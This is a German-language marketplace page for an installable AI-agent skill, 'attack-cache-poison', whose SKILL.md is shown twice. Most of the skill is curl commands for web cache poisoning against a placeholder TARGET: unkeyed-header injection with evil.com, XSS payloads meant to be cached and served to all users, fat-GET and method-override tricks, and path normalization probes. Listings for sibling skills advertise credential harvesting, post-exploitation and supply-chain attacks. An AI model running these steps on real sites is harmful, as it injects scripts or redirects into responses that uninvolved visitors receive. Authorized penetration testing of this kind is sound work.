Jeden Skill in Manus ausführen
mit einem Klick

Jeden Skill in Manus mit einem Klick ausführen

Loslegen

attack-cache-poison

Sterne617

Forks102

Aktualisiert1. Juni 2026 um 19:16

Web cache poisoning — unkeyed header/parameter injection to serve malicious content to all users

Installation

Mit Codex oder Claude installieren Kopieren Sie diesen Prompt, fügen Sie ihn in Codex, Claude oder einen anderen Assistant ein und lassen Sie die Skill-Seite prüfen und installieren.

In Manus ausführen

Quelle

CyberStrikeus

CyberStrikeus/CyberStrike

GitHub-Repository öffnen Creator-Repositorys ansehen

Download

In Manus ausführen

Verwandte BerufeSOC

Basierend auf der SOC-Berufsklassifikation

InformationssicherheitsanalystenInformatik- und Mathematikberufe·SOC 15-1212

SKILL.md

readonly

name	attack-cache-poison
description	Web cache poisoning — unkeyed header/parameter injection to serve malicious content to all users
category	web-application
version	1.0
author	cyberstrike-official
tags	["cache-poisoning","web","xss","attack"]
tech_stack	["web"]
cwe_ids	["CWE-444","CWE-525"]
chains_with	["attack-host-header","attack-open-redirect"]
prerequisites	[]
severity_boost	{"attack-host-header":"Host header + cache = stored XSS/redirect affecting all users"}

Web Cache Poisoning

Objective

Inject malicious content into cached responses via unkeyed inputs (headers, parameters) so that subsequent users receive the poisoned response.

Testing Methodology

Phase 1: Identify Cache Behavior

# Check cache headers
curl -s -D- https://TARGET/ | grep -i "x-cache\|age\|cache-control\|cf-cache\|x-varnish"

# Identify cache key components (vary header)
curl -s -D- https://TARGET/ | grep -i "vary"

Phase 2: Find Unkeyed Inputs

Test headers that are reflected in response but NOT part of cache key:

# X-Forwarded-Host
curl -s https://TARGET/ -H "X-Forwarded-Host: evil.com" | grep "evil.com"

# X-Forwarded-Scheme
curl -s https://TARGET/ -H "X-Forwarded-Scheme: nothttps" | grep "redirect"

# X-Original-URL / X-Rewrite-URL
curl -s https://TARGET/ -H "X-Original-URL: /admin"

# Custom headers
curl -s https://TARGET/ -H "X-Forwarded-Port: 1234"

Phase 3: Cache Poisoning via Unkeyed Header

# Poison with XSS payload
curl -s https://TARGET/ \
  -H "X-Forwarded-Host: evil.com\"><script>alert(1)</script>"

# Wait for cache to store, then verify
curl -s https://TARGET/ | grep "alert(1)"

Phase 4: Unkeyed Parameter Poisoning

# Find parameters not in cache key
curl -s "https://TARGET/?cb=123" -D- | grep "x-cache"
curl -s "https://TARGET/?utm_source=evil" | grep "evil"

# Reflected unkeyed parameter → stored XSS
curl -s "https://TARGET/?evil=<script>alert(1)</script>"

Phase 5: Fat GET / POST-based Poisoning

# Fat GET — body in GET request
curl -s https://TARGET/ -X GET -d "param=<script>alert(1)</script>"

# POST → GET cache confusion
curl -s https://TARGET/ -X POST \
  -H "X-HTTP-Method-Override: GET" \
  -d "param=evil"

Phase 6: Cache Key Normalization

# Path normalization differences
curl -s "https://TARGET/path/../admin"
curl -s "https://TARGET/PATH" vs "https://TARGET/path"
curl -s "https://TARGET/path;.js"

What Constitutes a Finding

Finding	Severity
Cached XSS payload served to other users	Critical (P1)
Cached redirect to attacker domain	High (P2)
Denial of service via cache poisoning (error page cached)	Medium (P3)
Unkeyed header reflected (no cache impact proven)	Low (P4)

Evidence Requirements

Unkeyed input identified (header or parameter)
Response showing injected content
Cache headers proving response was cached (X-Cache: HIT, Age > 0)
Second request (clean) still receiving poisoned content
Impact: XSS, redirect, or DoS

References

Mehr aus diesem Repository

gleiches Repository

ebpf-attacks

CyberStrikeus/CyberStrike

eBPF-based post-exploitation for kernel-level credential harvesting, process hiding, and traffic interception on Linux

2026-06-23617

aws-postexploit

CyberStrikeus/CyberStrike

AWS post-exploitation for IAM privilege escalation, data exfiltration, persistence, and operational security via boto3

2026-06-22617

azure-postexploit

CyberStrikeus/CyberStrike

Azure/Entra ID post-exploitation for tenant compromise, Key Vault extraction, managed identity abuse, and token manipulation

2026-06-22617

cicd-attacks

CyberStrikeus/CyberStrike

CI/CD pipeline attacks for secret extraction, pipeline injection, and supply chain compromise via GitHub/Jenkins/GitLab

2026-06-22617

k8s-postexploit

CyberStrikeus/CyberStrike

Kubernetes post-exploitation for container escape, secret extraction, RBAC abuse, and cluster persistence

2026-06-22617

macos-postexploit

CyberStrikeus/CyberStrike

macOS post-exploitation for credential harvesting, DTrace monitoring, TCC bypass, and stealth operations via native tools

2026-06-22617

name	attack-cache-poison
description	Web cache poisoning — unkeyed header/parameter injection to serve malicious content to all users
category	web-application
version	1.0
author	cyberstrike-official
tags	["cache-poisoning","web","xss","attack"]
tech_stack	["web"]
cwe_ids	["CWE-444","CWE-525"]
chains_with	["attack-host-header","attack-open-redirect"]
prerequisites	[]
severity_boost	{"attack-host-header":"Host header + cache = stored XSS/redirect affecting all users"}

Web Cache Poisoning

Objective

Inject malicious content into cached responses via unkeyed inputs (headers, parameters) so that subsequent users receive the poisoned response.

Testing Methodology

Phase 1: Identify Cache Behavior

# Check cache headers
curl -s -D- https://TARGET/ | grep -i "x-cache\|age\|cache-control\|cf-cache\|x-varnish"

# Identify cache key components (vary header)
curl -s -D- https://TARGET/ | grep -i "vary"

Phase 2: Find Unkeyed Inputs

Test headers that are reflected in response but NOT part of cache key:

# X-Forwarded-Host
curl -s https://TARGET/ -H "X-Forwarded-Host: evil.com" | grep "evil.com"

# X-Forwarded-Scheme
curl -s https://TARGET/ -H "X-Forwarded-Scheme: nothttps" | grep "redirect"

# X-Original-URL / X-Rewrite-URL
curl -s https://TARGET/ -H "X-Original-URL: /admin"

# Custom headers
curl -s https://TARGET/ -H "X-Forwarded-Port: 1234"

Phase 3: Cache Poisoning via Unkeyed Header

# Poison with XSS payload
curl -s https://TARGET/ \
  -H "X-Forwarded-Host: evil.com\"><script>alert(1)</script>"

# Wait for cache to store, then verify
curl -s https://TARGET/ | grep "alert(1)"

Phase 4: Unkeyed Parameter Poisoning

# Find parameters not in cache key
curl -s "https://TARGET/?cb=123" -D- | grep "x-cache"
curl -s "https://TARGET/?utm_source=evil" | grep "evil"

# Reflected unkeyed parameter → stored XSS
curl -s "https://TARGET/?evil=<script>alert(1)</script>"

Phase 5: Fat GET / POST-based Poisoning

# Fat GET — body in GET request
curl -s https://TARGET/ -X GET -d "param=<script>alert(1)</script>"

# POST → GET cache confusion
curl -s https://TARGET/ -X POST \
  -H "X-HTTP-Method-Override: GET" \
  -d "param=evil"

Phase 6: Cache Key Normalization

# Path normalization differences
curl -s "https://TARGET/path/../admin"
curl -s "https://TARGET/PATH" vs "https://TARGET/path"
curl -s "https://TARGET/path;.js"

What Constitutes a Finding

Finding	Severity
Cached XSS payload served to other users	Critical (P1)
Cached redirect to attacker domain	High (P2)
Denial of service via cache poisoning (error page cached)	Medium (P3)
Unkeyed header reflected (no cache impact proven)	Low (P4)

Evidence Requirements

Unkeyed input identified (header or parameter)
Response showing injected content
Cache headers proving response was cached (X-Cache: HIT, Age > 0)
Second request (clean) still receiving poisoned content
Impact: XSS, redirect, or DoS